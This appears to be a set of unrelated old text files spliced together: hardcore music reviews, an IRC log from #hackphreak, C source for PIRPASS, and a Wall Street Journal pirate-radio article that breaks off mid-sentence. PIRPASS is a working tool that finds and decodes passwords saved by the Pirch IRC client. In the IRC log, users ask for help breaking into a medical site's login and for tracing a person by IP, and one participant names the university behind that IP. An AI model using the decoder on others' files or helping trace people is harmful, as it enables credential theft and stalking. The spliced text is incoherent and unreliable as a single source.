Hard, fast, stompy and happy all at the same time and without being cheesy. This guy has even managed to get some breakbeats in here too. Reminds me of some really old tracks. 1995 kind of stuff. Jimmy J & CruLT's Forever Young springs to mind in places, as does Wierdo & Sim's remix of Motorway Madness. Both classics I'm sure you'll agree. I'm not saying he's ripped it or anything, just that its an excellent tune. Nice to see a hardcore track that isn't a ripoff too.



Title:          Joe - Rave With Me Tonight
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Rave

Another Lost Patrol offering from one of my favourite trackers. I think its a little bit too slow and a bit cheesy to be perfectly honest. It sounds very much like something by Dune. It has its good points. There's some really nice little synth lines in there, but really its a bit too cheesy for me. Not my style.



Title:          Skippin Trax 001
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Hardcore

Side A ('Till I Come) is a ripoff of 9pm 'Till I Come by ATB. Starts off nice and stompy with some cool synths in there. Your usual claps and kicks affair. It uses bits of the main tune which have been cut up to tantelise you, then builds up with a snare fill, and bits of the vocal to the main melody with the same synths under it. The vocal is used a lot more than in the original, and to great effect. Then it finishes with the same synth line it started with. Overall, An excellent track. Well worth getting your hands on a copy.
Side B (Smoke) is a slightly different affair. I'd say that it lets the record down a bit. Its a ripoff of Natalie Imbruglia's Smoke, and isn't anything special. A speeded up vocal and a standard hardcore beat is the main basis of the track. There is some very clever work with a cut up vocal, but the track has little else to offer. Its a pretty average track. I'd still advise you to get a copy for the A side though.



Title:          DJ Dodgee - Untitled mixtape
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Hardcore

Tracklist:
Force & Evolution - Perfect Dreams (DB7 mix)
Q-Tex - Take Me Up
Sy & Unknown - Head In The Clouds
Scott Brown - I Don't Need Nobody
Brisk & Vinylgroover - Freedom 2 Dance
Bananaman & Blitz - Funk You
Tiny Tot - Discoland (Dreadlands '99 rmx)
Northern Lights - Love Of My Life (Brisk rmx)
Stealth - See Me Climb
Demo & Digital Illusion - The Way
Spitfire - Feel This Way
Audio Assault - Magic Touch (Brisk rmx)
Interstate - Lost Generation (Scott Brown rmx)
Vinylgroover & Trixxy - Seven Ways
Tekneek - Sensory Vision

The tracklist consists some absolutely excellent tunes with some crap thrown in to keep the cheezers happy, but more of the cool tunes. The mixing is a bit variable too. Its mostly very smooth. And there's some really nice scratching in places, which isn't too overpowering. But on one or two occasions, the mixing is a bit dodgy, and the punches in the middle of I Don't Need Nobody sound a bit out to me. Overall, its a pretty good sounding mix, although the mixing sounds a bit basic. Expect to see more from Dodgee, with a slightly more refined sound.


Title:          Darkcyde - Take Me Away
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Hardcore/Oldskool

Darkcyde describes this tune as "Nuskool oldskool amen-tastic breakbeat rinseout with the battered Loleatta Holloway vocals that Cappella used in 91 or whatever". Which I think just about sums it up. Congratulations to Darkcyde on a great track which actually reviews itself. There's some really nice synth lines and stuff in it too, which is always nice.


Title:          DJ Skippy - Untitled Mix
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Hardcore

Tracklist:
1. Vinylgroover - John Gotti's Revenge-prime 007
2. legend ltd 003-touch me-white label
3. Hixxy - Starry Night-legend 003
4. two 25 promo-remember-white promo (due for release next month...i think)
5. BnH2-BnH2
6. Hixxy - Thumper-legend 003
7. two ltd 4-???-white label

A nice sounding mix from the man behind Skippin Trax with some abloutely great tunes, and some not quite so great ones. I particularly like the track at the beginning with the piano sample that has been "borrowed" from Lighter by DJ SS. Nice to see Vinylgroover producing something worth listening to for a change. But I digress. The mixing is just about faultless with some nice scratching and all the other things you'd look for in a halfway decent mix.


Disclaimer: If you don't like what we say about your music then tough shit. We both review tracks and mixes fairly regardless of how much we (dis)like the person who made it. These are our opinions. You may not agree with them.

Walrus (ergophobe@dial.pipex.com)
CrossFire (crossfire@hackers-uk.freeserve.co.uk)IP Spanking
Logged From #hackphreak


<HuSoft> Hi
<HuSoft> is there any exploit for FTP'S?
<walrus> yeah
<walrus> you can use an anonymous login to get the password file
<walrus> on some UNIX boxes
<HuSoft> I did that
<HuSoft> but, is shadowed.
<HuSoft> and I can't get the shadow passwd file
<nerd> spank it
<nerd> thats your only chance
<walrus> with a big ugly stick
<nerd> spank it true
<HuSoft> spank?
<nerd> yeah
<nerd> you never heard of the spank technique?
<nerd> you some kinda lamer?
<HuSoft> never man
<nerd> ??
<HuSoft> nope
<nerd> shit dood
<inxs> spanking is the ultimate in teqneek
<nerd> hells yeh

<HuSoft> that's why I don't know that technique
<HuSoft> cause I have a lot of time out
<inxs> oh
<HuSoft> now Im here again
<nerd> heh oh well
<inxs> take a lot of time, especially the monkey spanking teqneek
<HuSoft> when I find text's about that?
<nerd> ohhh thats the ultimate in spank tecnoloG
<inxs> HuSoft, you think you can learn how to spank your monkey?
<HuSoft> I can learn whatever

<inxs> cool
<nerd> I think theres even an rfC file on the spank teknique
<HuSoft> and where can I find it?

<inxs> well, it's quite easy to find really
<HuSoft> yeah?
<nerd> go to www.lamer.com  I think it's there
<inxs> nerd, would you agree with that?
<nerd> yeah definately
<HuSoft> oh nerd
<nerd> it's there in there text section
<nerd> no it's a real site for learning shit
<HuSoft> ok
<nerd> yeh go there
<inxs> yeh, real shit
<nerd> click on there text file like
<nerd> like=link
<HuSoft> ok
<nerd> and look for rfc666

<nerd> or it might have been rfc 420
<inxs> yeh, that sounds right, though i heard the nsa were going to classify the rfc
<tofus> fuck the nsa
<tofus> their wimps
<tofus> they're even
<tofus> ;p

<inxs> tofus, we were discussing the rfc on the spanking teqneek
<HuSoft> hey nerd, there is all about MP3!
<nerd> hmmm
<tofus> aha
<tofus> the spanking teqneek
<nerd> yes

<tofus> ph33r my kungfu 5k1LL2
<nerd> maybe that wasnt the site
<inxs> specifically relating to monkey spanking, HuSoft is going to learn to spank the monkey
<nerd> yeah it complicated tho
<nerd> he needs an rfc for it
<tofus> that sucks, dude!
<nerd> yeah
<nerd> oh well
<nerd> I can't rerally remember the site
<nerd> maybe it was www.lamour.net 
<nerd>  or something........
<nerd> try shit like that
<walrus> or lamer.co.uk
<tofus> dudes, gotta hover...gotta catch a train
<walrus> surf.to/lamer
<HuSoft> I found it in other place nerd

<inxs> or, you could try the search engine on antionline.com, search for monkey spanking and you should get plenty of hits, a few of the antionline people are real monkey spankers
<SEPULTURA> anyone know something about POP3?
<HuSoft> I found it on YAHOO
<nerd> yeah.....it's by far the best technique

<nerd> well read up man
<nerd> learn it well
<helpmeplz> http://www.medismk.net/cgi-bin/vreme.pl ->Can someone tell me what is this and how can I brake into this ?
<walrus> as in can we all hack it for you
<walrus> no
<inxs> walrus, you should message HuSoft about the technique he is learning, it may help you
<inxs> oops
<helpmeplz> http://www.medismk.net/html/login1.htm ->What about this can someone brake here ??

<inxs> i ment to say helpmeplz, you should message HuSoft about the technique he is learning, it may help you
<walrus> thank you
<walrus> you are forgiven
<SEPULTURA> MOSSAD.ORG is workinh only on POP3 and HTTP anyone can help me to find backdoor? msg me
<inxs> well with HuSoft off spanking his monkey, we will need a new diverion

<AlphaVers> howdyz

<dimak> hello
<dimak> huSoft I am here
<inxs> HuSoft is off spanking his monkey
<walrus> he's learning to. He's not quite mastered it
<inxs> true, he probably still hasn't quite come to grips with it yet
<AlphaVers> he's learning how to spank his monkey?
<AlphaVers> or did i miss something again?
<inxs> he will truly learn the value of in depth knowledge of the end knob and it's principal purpose
<dimak> can you help me with a problem?
<inxs> AlphaVers, no you got it right, he is learning to spank his monkey
<AlphaVers> cool
<dimak> I heed to understand IPv4 address and find out the exact location of e person, can anyone help me?
<inxs> dimak, ask HuSoft about monkey spanking
<dimak> I heed to understand IPv4 address and find out the exact location of e person, can anyone help me?

<symbolik> uNFuNFuNF
<inxs> dimak, you also need to learn about themonkey spanking teqneek
<symbolik> _i_nxs_,_ you got the log from that night?
<inxs> which nite?
<dimak> ?
<symbolik> the one we were fightin in here
<symbolik> think it was you
<symbolik> hehe
<inxs> i doubt it
<inxs> i mean i doubt i have the log
<dimak> can you help me with the problem?
<walrus> msg husoft about the spank technique
<inxs> dimak, i told you, message HuSoft and ask him how to spank the monkey
<walrus> the spank technique covers a wide range of areas
<symbolik> it's neat when people say they code and then they say things like this...
<symbolik> [Letsdoit(letsdoit@209-145-180-74.accessus.net)] cobol assemblier fortran systems design to name a few

<symbolik> makes me giggle
<inxs> makes me puke
<inxs> heh
<symbolik> ya that too
<inxs> and i dont code
<inxs> i wish i had been logging tonite
<walrus> I am
<inxs> i could have spared a few meg for the idiocy of the evening
<symbolik> i wish i logged period
<symbolik> makes for funny bedtime stories
<symbolik> wish i had been logging myself for the past week
<symbolik> never been drunker in all my life
<symbolik> has trav talked at all tonight?
<symbolik> hrm
<inxs> no
<symbolik> dang
<dimak> I heed to understand IPv4 address and find out the exact location of e person, can anybody help me? please
<inxs> dimak, have you learned how to spank your monkey yet?
<walrus> the spank technique cobers IPv4 as well as password files
<walrus> covers even
<inxs> i think it also has a primer on ipv6 and possibly location teqneeks using ipv4
<walrus> its very versatile
<AlphaVers> wait, dimak doesn't know the spank technique yet?
<helpmeplz> http://www.medismk.net/html/login1.htm ->What about this can someone brake here it's linked to http://StNaum.medismk.net/cgi-bin/qqqq/login.cgi??
<inxs> true
<walrus> that's why its so complex
<inxs> AlphaVers, doesn't look like it
<AlphaVers> dude, that's basic knowledge
<AlphaVers> you won't get nowhere without knowing it
<inxs> helpmeplz, you would make a good monkey spanker, you also should learn the teqneek
<inxs> if only JP was here, i am sure he would teach these peasants how to spank the monkey
<inxs> JP is a true sensei of monkey psanking
<inxs> spanking
<dimak> Dear, what am I to do?
<AlphaVers> dimak, easy, learn how to spank
<dimak> where?
<AlphaVers> mail jp@antionline.com about it
<AlphaVers> he knows
<AlphaVers> thanx inxs
<inxs> hey, good idea
<walrus> yeah. He's a really good spanker
<inxs> in fact, i think that will work

<helpmeplz> http://www.medismk.net/html/login1.htm ->What about this can someone brake here it's linked to http://StNaum.medismk.net/cgi-bin/qqqq/login.cgi??
<AlphaVers> you have to ask nice though, he doesn't like teaching
<AlphaVers> so if you don't ask him right, he won't reply or feed you some bullshit
<inxs> next one to repeat a question, who has not availed themselves the oppurtunity to learn monkey spanking from JP, gets banned
<inxs> back in a bit, a rugby game on tv

<dimak> ok I will mail him, but is it possible to know to decode IP right now?
<walrus> not without learning 'spank'
<HuSoft> hey people from #HACKPHREAK!!!!!!!
<HuSoft> RFC specifies an IAB standards track protocol for the Internet
<HuSoft>    community, and requests discussion and suggestions for improvements.
<HuSoft>    Please refer to the current edition of the "IAB Official Protocol
<HuSoft>    Standards" for the standardization state and status of this protocol.
<HuSoft>    Distribution of this memo is unlimited.
<HuSoft> heh ;)
<HuSoft> I found it
<AlphaVers> you need an ip decoder, which requires knowledge of the spank technique to use
<HuSoft> ok
<walrus> yeah. You can code spank programs in BASIC
<b00ze> hi ppl
<AlphaVers> in order to decode an ip you need to know the spank level of it
<dimak> damn, maybe some can help me to understand just one IP address, I need it promtly, I need to hfind one my friend
<AlphaVers> that's why you need to know how to spank
<nerd> right but spanking isn't for everyone.....
<AlphaVers> spanking makes the difference between hackers and lamers
<walrus> yeah. Most girls are crap at spanking
<nerd> some people just can't handle it's raw power
<dimak> guys, can you decode the IP for me?
<AlphaVers> sure, what is it?
<dimak> will it take much time?
<walrus> yeah. That's why it helps to write a spank program in BASIC
<AlphaVers> nah not really
<walrus> it makes it easier
<AlphaVers> dimak, what's the ip?
<walrus> yeah. Tell us the ip
<walrus> and we'll help you out a little
<nerd> spanking is much easier with basic......using tools to enhace the spank teqnique is the only way
<dimak> AlphVers, X-Originating-IP: [128.252.61.5]
<walrus> you see b00ze's ip was 202.163.254.105
<AlphaVers> that's spank level 8 ain't it?
<walrus> dimak: that has a spank level of 1 because the first digit is 1
<AlphaVers> this may take a while after all
<nerd> dood spank level8??
<walrus> oh hang on, the 3rd digit is 8
<walrus> oh yeah. Got a bit confused there
<walrus> sorry. SPANK LEVEL 8!!!
<AlphaVers> oh well
<walrus> fuck
<AlphaVers> lemme get my spanker
<walrus> b00ze would've been easier to hack 'cause it was only a level 2 spank
<walrus> 202.163.254.105 you see
<walrus> spank level 2
<walrus> but spank level 8!!!
<walrus> that's gonna be tricky
<AlphaVers> dimak, are you sure that's correct?
<AlphaVers> i can't spank the sequence out of it
<nerd> spank level 8 thats some 3331337 shiznit
<dimak> yes, i got from e-mail that was maild from Hotmail
<nerd> wow
<AlphaVers> hotmail? uhoh
<nerd> so your familiar with the spank protocol?
<AlphaVers> hotmail has it's own way of spanking

<AlphaVers> you'd need a hotmail decoder for it
<dimak> i got a message from hotmail, it has IP address in properties
<dimak> where I can get it?

<walrus> yeah. Spank level 8 ips never change

<walrus> and the hotmail spank level 8 is even more difficult
<AlphaVers> wait
<walrus> you need to do some pretty difficult BASIC coding to spank that one man
<AlphaVers> there it is
<nerd> now those hotmail admins know how to spank
<AlphaVers> think i got something here
<walrus> what is it
<walrus> I've never got a spank level 8 before
<AlphaVers> washington university in st louis
<nerd> yeah I've never actually encountered a spank level 8 either
<AlphaVers> or atleast, that's the last hop before the monkey puked
<nerd> ohhh dammit I hate premature termination
<AlphaVers> i assume they own the entire spank range
<walrus> The problem is that he probley bounced, 'cause you only get spank level 8 for companies and stuff
<AlphaVers> if they do, that's where it came from
<dimak> AV, How did you get that? the exact name of the location? I thoght it should have been geographical
<walrus> not home users
<AlphaVers> dimak, by spanking the monkey of course
<dimak> it gave you the university name?

<AlphaVers> yup
<AlphaVers> it looks like it came from somewhere on the east side of campus
<AlphaVers> not sure
<AlphaVers> could be south-east too
<nerd> well the monkey spank protocol is quite wily it can get kinda hairy if your not familiar with it's proper usage...I like to use standard spank
<AlphaVers> nerd, come on
<AlphaVers> standard spank sucks
<nerd> ok ok 

<nerd> call me old fasion
<dimak> I is greate. thank you very much, how can you tell me this, it is amazing, I hardly believe the ip can get such detailed info
<walrus> the thing is that hotmail spank is more secure
<AlphaVers> you won't even get an address with a standard spank on an arp
<nerd> oh yeah by far
<walrus> and the monkey that hotmail spank uses for level 8 spank is more prone to 'puking'
<dimak> AlphaVers, do you have a kind of database for IP codes?
<nerd> yeah correct that premature termination is a bitch
<AlphaVers> dimak, it's dynamicly created everytime i spank
<AlphaVers> if i spank you for instance, it would create a database with info on you
<dimak> where is the initial information from?
<ratshat> i forgot my password for a excel file anyone know a way around?
<AlphaVers> but unauthorized spanking is kinda illegal
<walrus> I'd have to say that theis guy probably bounced 'cause a level 8 spank is not usually seen with a home user. He must've gone through an organisation, or that could just be the hotmail spank security
<dimak> why illegal?

<AlphaVers> if  would spank a cia agent for instance
<AlphaVers> i'd be able to get all info on him i want
<AlphaVers> they don't like that
<walrus> but they use standard spank so what do they expect?
<AlphaVers> it's only legal on ip's in ranges below 200.
<[tefx]> hehe
<AlphaVers> it's like using hotmail
<AlphaVers> you know everyone can read your mail, but if they do you won't like it
<dimak> well, but you should know he is the agent, but you do not know. if you know I might gess you are the agent too, and the legal for you is not determined. :)

<dimak> AlphaVers, who sets the rules on spanking?
<walrus> the monkey of course
<AlphaVers> trust me, spanking on ip's above the 200. range is illegal for me
<[tefx]> hymm
<AlphaVers> dimak, nsa does
<walrus> the monkey sets the rules
<Ody|away> lmao
<AlphaVers> the monkey's with the nsa
<[tefx]> i think theres different ranges in th uk. not much though
<nerd> but I heard a spank session is hard to detect..........do you have to use some sort of spoofing method to have a truly successful spank?
<dimak> what is above 200?
<walrus> yeah. In the UK you can only spank up to level 4
<AlphaVers> ned yes, spank soofing
<AlphaVers> really hard to do though
<AlphaVers> nerd even
<nerd> so I have heard
<dimak> what is above 200?
<[tefx]> walrus. in scotland it goes up to 8, but in amsterdam, they let you smoke pot while you spank
<nerd> thats the critical zone

<walrus> what about wales?
<AlphaVers> like you're ip: 212.48.192.150, that would be illegal
<[tefx]> hmm
<HuSoft> hi again people!
<AlphaVers> to spank
<walrus> I think spanking has been outlawed there
<[tefx]> as they have lega sheep spanking , i recon about a 6
<[tefx]> nah
<walrus> yeah. Sheep spanking is on its way out
<[tefx]> only sheep spanking is legal, none of this monkey crap
<walrus> hotmail spank is the new protocol
<AlphaVers> sheep spanking was used on arpanet
<[tefx]> SSP/IP
<AlphaVers> i think milnet still uses sheep spank
<dimak> AlphaVers, is it possible to prevent spanking of IP, for instance if I send e-mail and do not people to spank it?
<[tefx]> sheep spanking protocoll , intyercourse protocoll
<walrus> hotmail spank is fast becoming the global monkey spanking standard
<[tefx]> ugh
<AlphaVers> dimak, that would get the monkey pissed
<[tefx]> what about spanking penguins ?
<dimak> so it is possible, is it?
<nerd> I heard the aol spank was pretty 1337
<walrus> I didn't think penguin spanking had been introduced yet
<[tefx]> yeah, its a new nmut upgrade
<[tefx]> nut i mean
<AlphaVers> walrus, penguin spanking is still an experiment
<nerd> hmm...thats far out shit tho
<[tefx]> its in beta test

<[tefx]> yeah,
<[tefx]> aint it daemon >?<
<AlphaVers> bsdi got pissed over that
<AlphaVers> so they made it deamon
<[tefx]> your telling me
<walrus> as far as I know the pp (penguin protocol) won't be introduced until IPv6 is introduced
<[tefx]> argh.
<[tefx]> oh, well, there still hope
<walrus> then it will become standard
<AlphaVers> we all know dsp (deamon spanking protocol) will kick pp's ass
<walrus> and the monkey spanking and hotmail spanking will bothe be fazed out
<[tefx]> apart from the spanking protocolls there the feet sub set : then theres ftp : foot tapping ptotocoll, http : hyper toe tapping protocoll, 
<nerd> yeh no shit
<[tefx]> i still think pengiun still has a chance
<[tefx]> hmm.
<[tefx]> i guess we'll just have to wait and see
<walrus> dimak: do you still want to know how to avoid spanking?
<[tefx]> yeah. avoid  the leather whip protocoll LWP
<dimak> yes
<AlphaVers> dimak, log that, jp won't tell you how to avoid it
<walrus> right. Go on yahoo, and search for info on anti spanking techniques
<[tefx]> heh
<walrus> yahoo is the best one for this
<[tefx]> and put in NO porn in the search as well
<[tefx]> i prefer altavista
<walrus> 'cause some twisted people will associate it with sex
<[tefx]> i though yahoo removed the spanking category ?
<AlphaVers> just be sure you don't get yahoo spanking, that hasn't been used since '91
<AlphaVers> tefx, the put it back
<AlphaVers> too much compliants
<walrus> popular demand
<[tefx]> good.
<walrus> anyway
<walrus> ...
<[tefx]> not suprised
<[tefx]> i was pissedd of when it left
<walrus> you need to find a page that gives you an anti spank script
<AlphaVers> jp threatened to sue them if they didn'tput it back
<walrus> and you send your email through the script
<walrus> and then nobody can spank your ip
<[tefx]> i rmeber when hotmail spanking and mircosoft spanking were totally different, bemore the intercourse, now its passport spanking
<walrus> 'cause its hidden
<AlphaVers> dimak, what os are you on?
<nerd> right to smite a spank you must cause the incoming spank packet to be intercepted by some medium .........it should kinda absorb the spank packet
<walrus> do you want to aviod hotmail spank, or regular spank?
<dimak> w95
<AlphaVers> damn
<AlphaVers> if you were on bsd i'd have one for you
<[tefx]> uh-oh
<[tefx]> theres but spanking youve got to avoid aswell
<AlphaVers> i wrote one a while ago
<AlphaVers> working to get it ready for pp
<AlphaVers> and dsp
<nerd> but trying to protect yourself from everytype of spank is ludicrous
<[tefx]> i had a spanking setector, but it needed a few other files, 
<walrus> an anti-hotmail spank script for BSD? Did you write that in BASIC?
<dimak> alpha, what is bsd?
<AlphaVers> walrus, yeah
<[tefx]> when you got spanked on win95, it would say Invalid page fault
<AlphaVers> gbase
<dimak> hever heard
<[tefx]> a general protection fault, is a time delayed spank
<AlphaVers> yeah
<walrus> of course newer releases of Win 98 has been patched against hotmail spanks above level 5
<AlphaVers> every time you get one you got spanked
<[tefx]> quite nasty
<walrus> Does anybody know about Win NT spanking?
<AlphaVers> walrus, it'll crash above level 7
<nerd> thats a sensitive area
<walrus> I've not had time to get any info on spaking in NT
<AlphaVers> been fixed in service pack 5 i think
<walrus> does it depend on what SP (spank pack) you've got
<[tefx]> heh there l0pht spank
<[tefx]> dont forget that
<nerd> no I think service pack five still had some errors handling the level 8 spank
<AlphaVers> wlarus, yeah, sp 3 should do the trick
<walrus> poeple oftenget service packs and spank packs confused
<AlphaVers> be carefull though, your spank black will stop working
<walrus> You need to modify your registry for spank pack 4 to work don't you?
<nerd> shit of course what was I thinking......
<AlphaVers> yeah
<AlphaVers> add an extra spank key
<nerd> yeah I wrote a BASIC script for that 
<AlphaVers> nerd, cool
<[tefx]> what about pgp spanking
<walrus> but some spank packets can still get around that one. For istance the beta penguin spanks can already get through that
<AlphaVers> tefx, don't go there man
<AlphaVers> you never know who's listening in here
<AlphaVers> shit man why the fuck did you mention that?
<walrus> It'd fall on deaf ears
<AlphaVers> you know how the gov feels about pgp spanking
<[tefx]> ah true
<walrus> mostof the lamerz in here don't even know the difference between a sheep spank and a standard monkey spank
<nerd> I don't think we should talk about the pgp spank
<AlphaVers> dimak, forget about pgp spanking
<nerd> I am feeling uncomfortable
<[tefx]> we could always talk about the clipper spanking controversy
<AlphaVers> tefx, don't
<walrus> I've not heard about that one
<[tefx]> oh
<AlphaVers> i got raided for telling ppl about that
<[tefx]> ill lay off the cryto spanking
<walrus> dimak: you found an antispank script yet?
<AlphaVers> they took my hardware spank block
<nerd> shit man
<dimak> still trying on yahoo
<[tefx]> oh god.
<AlphaVers> took me 2 years to build that thing
<[tefx]> thank god its not so bad here in the uk
<AlphaVers> correct parts are very hard to find
<walrus> I'm using a software block to stop hotmail spanks above level 4, 'cause hotmail spank is the most common one
<[tefx]> as long as they dont take my spanking board
<AlphaVers> tefx, if you don't tell anyone you have it, you're ok
<[tefx]> spanking board, what spanking board ;)
<walrus> I find that a software block can absorb most of the spank packets caused by 'puking'
<dimak> i found textbook on http://lib.daemon.am/Books/Hackers_Guide/ch26/ch26.htm
<[tefx]> no
<[tefx]> thats nsa.
<[tefx]> its the nsa
<walrus> yeah. But the monkey is in the NSA remember
<[tefx]> its instructions on how to let them spank you
<walrus> AV was saying earlier
<walrus> stay away from that
<walrus> it could be a 'spank trojan'
<nerd> ohhh nasty
<walrus> like monkey's orifice
<AlphaVers> dimak, you should get a spank scanner too
<nerd> right the monkeys orifice is like a huge hole man......fucking insanity
<[tefx]> then thers pmonkey orifice 2k
<walrus> its not that great though
<AlphaVers> brb
<[tefx]> then thers hotmail-bus
<AlphaVers> gotta set up some phone spanking stuff
<nerd> soanking the phonelines is some next level shit
<nerd> whoa
<nerd> spanking
<AlphaVers> not the lines, cell phones
<[tefx]> whoo
<AlphaVers> prepay mainly
<[tefx]> then threse pager spanking
<nerd> right  what was I thinking
<nerd> obviously I wasn't

<walrus> bye all
<dimak> guys, it is impossible ot seearch the stuff via yahoo

[12:34] <[tefx]> cyas walrus
[12:34] *** Parts: walrus (walrus@userb402.uk.uudial.com)
[12:34] <AlphaVers> if you spank a nokia 6110 it'll give you it's card
[12:35] <[tefx]> true
[12:35] <[tefx]> then theres chocking techniques.
[12:35] <[tefx]> chocking the chicken often works
[12:35] <dimak> it gives out shit
[12:35] <nerd> I find the choke protocol very useful
[12:35] <[tefx]> or the bash
[12:35] <[tefx]> bash:~>bishop
[12:35] <[tefx]> bashing bishop
[12:35] <AlphaVers> don't teach him how to choke man
[12:36] <nerd> it allowss better control of the whole spank
[12:36] <nerd> ok ok 
[12:36] <[tefx]> acces found, level 4, using monkey.... ok
[12:36] <AlphaVers> he ain't ready
[12:36] <[tefx]> true
[12:36] <AlphaVers> let him fogure out the simple monkey first
[12:36] <[tefx]> heh
[12:36] <[tefx]> that can take years
[12:36] <AlphaVers> figure even
[12:36] <AlphaVers> tefx, true
[12:37] <[tefx]> or minutes
[12:37] <nerd> right.....he has to start with the monkey spank or he'll go nowhere fast
[12:37] <AlphaVers> took me over a year to get the monkey too
[12:37] <[tefx]> if you can do seemore more also know as C++
[12:37] <[tefx]> it takes minutes
[12:37] <dimak> ok, bye all, thank AlphaVers very much for help
[12:37] <nerd> yeah but once you have the monkey the rest is pretty much natural
[12:37] <[tefx]> yeah
[12:38] <AlphaVers> you're welcome
[12:38] <dimak> bye
[12:38] *** Parts: dimak (dimakworld@ppp-150.pool-113.spbnit.ru)
[12:38] <AlphaVers> later
[12:38] <[tefx]> heh
[12:38] <nerd> brb I am gonna try this new spank technique so I might be gone for awhile
[12:39] <[tefx]> heh
[12:40] <[tefx]> who else wnats to know about spanking ?
[12:42] <nerd> well I am back....
[12:42] <nerd> that spanking method was quite impressive 
[12:42] <nerd> I think it was written in hypercard
[12:42] <AlphaVers> partially
[12:43] <[tefx]> heh, mine was done in flash
[12:43] <AlphaVers> some was written in cobol as well
[12:43] <nerd> wow
[12:43] <AlphaVers> depends on the os
[12:43] *** Joins: d5 (~d5@wind.angen.net)
[12:43] <nerd> I heard of these hypercard spanks so I had to try it out.....
[12:44] <d5>  hello
[12:44] <nerd> they terminate twice as fast as your standard spank
[12:44] <nerd> I like to reffer to it as the hyperspank
[12:45] *** Quits: d5 (spank-lined)
[12:45] <AlphaVers> cool
[12:45] <[tefx]> uh oh
[12:45] <[tefx]> somebody tried a spank
[12:45] <nerd> NO WAY
[12:45] <[tefx]> [12:45] *** Quits: d5 (spank-lined)
[12:45] <nerd> you were spanked by a foriegn host?
[12:45] <[tefx]> on undernet. ;)
[12:46] <[tefx]> silly boy, either that or an operator spanked him
[12:46] <AlphaVers> for his sake i hope it was an op
[12:46] *** Joins: x-deth (~r00t@ppp664.ath.forthnet.gr)
[12:46] <x-deth> hi
[12:46] <DaRkRe|gN> wellcome
[12:46] <AlphaVers> howdyz x-deth
[12:47] *** Joins: d5 (~d5@wind.angen.net)
[12:47] <x-deth> sup? =)
[12:47] <d5>  i was just tryping /spank in mirc and i got a message froma n op ? what happened
[12:47] <AlphaVers> you missed out on some good spaning x-deth
[12:47] <nerd> well i better head out..........but ehm remember not to forget what we sed here cose it was very important 
[12:48] <d5>  why doesnt mirc spanking work on undernet
[12:48] <nerd> may the spank protocol be with you
[12:48] *** Quits: nerd (Yadayadayada - Ed)
[12:48] <AlphaVers> nerd, go spank 'm
[12:49] *** Quits: d5 (Spank Lined - [Undernet.org] - I told you once, i don't like spanmks)
[12:55] <[tefx]> so any more spanking questions
[13:19] <tek7> whats uid and gid ?
[13:19] <tek7> uid=0 (root)
[13:19] <tek7> gid=0 (root)
[13:19] <tek7> ?
[13:20] <AlphaVers> tek, yeah
[13:20] <AlphaVers> gid 0 depends on the os
[13:20] <AlphaVers> it's the group root is in
[13:20] <tek7> os is rh 5.1
[13:20] <tek7> 2.0.34
[13:20] <tek7> hmm 
[13:21] <tek7> oki
[13:32] * [tefx] is off/*****************************************************************
 *                                                               *
 * PIRPASS.C by EXE-Gency                                        *
 * A program to search the current directory for the any pirch   *
 * passwords. (Pirch is a program that can be used for accessing *
 * IRC.) Password is normally stored in PIRCH98.INI but PIRPASS  *
 * supports wildcards to you can use GETPIRCH *.INI as well as   *
 * GETPIRCH PIRCH98.INI. The decryption algorithm is taken from  *
 * a file by Daemon0/Underground Periodical.                     *
 *                                                               *
 * If you want to compile the source code yourself you'll need a *
 * copy of DJGPP:                                                *
 *                                                               *
 * GCC -O PIRPASS.EXE PIRPASS.C                                  *
 *                                                               *
 *****************************************************************/

#include "stdio.h"
#include "dir.h"
#include "string.h"
#include "process.h"

int main(int Argc, char *Argv[]) {
    FILE         *PasswordFile;
    struct ffblk FileSearch;
    unsigned int SearchResult, SearchCount;
    char         String[100], *Ptr;

    if(Argc!=2) {
        printf("PIRPASS v1.0 by EXE-Gency\n");
        printf("Syntax: PIRPASS [filename]\n");
        printf("E.G:    PIRPASS PIRCH98.INI\n");
        exit(1);
    }

    printf("PIRPASS v1.0 by EXE-Gency. Program to get pirch password.\n");

    SearchCount=0;

    SearchResult=findfirst(Argv[1], &FileSearch, 0);
    while(!SearchResult) {
        SearchCount++;
        if((PasswordFile=fopen(FileSearch.ff_name, "r"))==NULL) {
            printf("Cannot open file [%s] for reading!\n", FileSearch.ff_name);
        } else {
            while(!feof(PasswordFile)) {
                fgets(String, 99, PasswordFile);
                Ptr=strstr(String, "Pw=");
                if(Ptr) {
                    Ptr+=3;
                    printf("Found password [");
                    while(*Ptr!=10) {
                        printf("%c", (*Ptr)-127);
                        Ptr++;
                    }
                    printf("] in file [%s]\n", FileSearch.ff_name);
                }
            }
            fclose(PasswordFile);
        }
        SearchResult=findnext(&FileSearch);
    }
    printf("Finished! %u files scanned.", SearchCount);
    return 0;
}
Mr. Brewer the Pirate Doesn't Rule Waves, He Just Makes Them
(

  Illegal Broadcaster Has Taunted Government for 2 Years; FCC Man:
  `I'll Nail Him'


By Bruce Orwall
Staff Reporter of The Wall Street Journal

   Temple Terrace, Fla. - Radio station 102.1 FM emanates from this
Tampa suburb with a crisp, clear signal that carries its biker rock
and raunchy talk as far as 20 miles.
   Its largest audience, bikers and college students, likes the
station just fine, enjoying the sex-charged banter, the oddball music
and the attitude against authority.  It's the authorities who have a
problem with 102.1 FM: The Federal Communications Commission says the
station, broadcasting out of Doug Brewer's converted garage, is
illegal.
   Mr Brewer's operation is one of hundreds of unlicensed, or pirate
stations, in the U.S., which is in the midst of an unprecedented boom
in illegal broadcasting.  Mr. Brewer, long-haired, beefy and a
self-described redneck biker, has emerged as one of the pirate
movement's premier outlaws, mostly because he has thwarted FCC efforts
to shut him down for almost two years.
   This despite the fact that Mr. Brewer, who calls his station
"Tampa's Party Pirate," has made himself an easy target.  It is no
secret that he broadcasts from his garage, where compact disks are
strewn indiscriminately and the walls are lined with biker-babe pinups
and pictures of stock-car racing stars.
   "It's ongoing, it's visible, and it just plain rocks," brags
Mr. Brewer, who cultivates an on-air image of a rough and tumble biker
and isn't averse to self-aggrandizement off the air.  His promotional
T-shirts boast, "License? We don't need no stinking license" - though
truth be told, Mr. Brewer tried to get a license and was turned down.
   The FCC has been hard-pressed to keep up with the pirate
proliferation and has successfully shut down just a few of the
multiplying radio bandits.  The commission first acted against Tampa's
